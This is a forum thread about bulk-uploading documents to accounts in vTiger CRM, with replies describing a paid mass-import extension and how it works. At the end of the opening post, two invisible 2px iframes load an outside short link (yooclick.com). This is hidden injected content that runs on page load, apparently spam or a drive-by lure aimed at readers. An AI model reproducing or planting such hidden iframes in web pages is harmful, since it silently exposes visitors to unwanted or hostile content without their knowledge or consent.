Adding multiple documents at once

(still in the process of creating a proof of concept to take to management.)

I'm working the our workflow of creating a client account, currently what we do is have the customer sign a "sign off sheet" that says that the work was completed. Also, we take multiple pictures of the install. Currently we create a folder, and put the scanned document and pictures.

Now, i'd like to move this process into vTiger. This is doable, however, you have to add each document 1 at a time. Each of our clients (or accounts) may have 5-10 pictures to add, so this does become fairly time consuming.

What i'm wondering is: is there a way to upload multiple documents onto an Account, or would I have to custom build this? <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

• 6 Comments sorted by Votes Date Added
  • no there is no way to do this in the application. we have created a mass document import extension that may be of your interest. contact me for information and pricing if you are interested.
  • no there is no way to do this in the application. we have created a mass document import extension that may be of your interest. contact me for information and pricing if you are interested.

send me some information please joe

thanks bernard
  • this works like this:
    - it is a vtlib compatible extension, so it is installed via the module manager interface.
    - once installed you must edit a configuration file to change a directory variable. this directory is where the documents must be copied and from where the extension will read them and import them.
    - when you access the extension you are greeted with an edit document screen that asks for a reference, user, folder and description. when save is pushed the import process will read documents in from the established folder on the harddisk. each document will have the format: id_filename.ext
    we will search for id as contact_no, if not found as account_no. we will insert a new document in the system assigned to the selected user, in the chosen folder, with the given title and description, associated to the contact/account if found and with the name filename.ext
    - if no account/contact is found the document is not imported.
    - if document is imported, it is eliminated from the directory

obviously we can change the logic to associate to any other entity or by any other field.

price: 65 euros
  • is this add on this available and working with v5.4? do you have a demo?

thanks!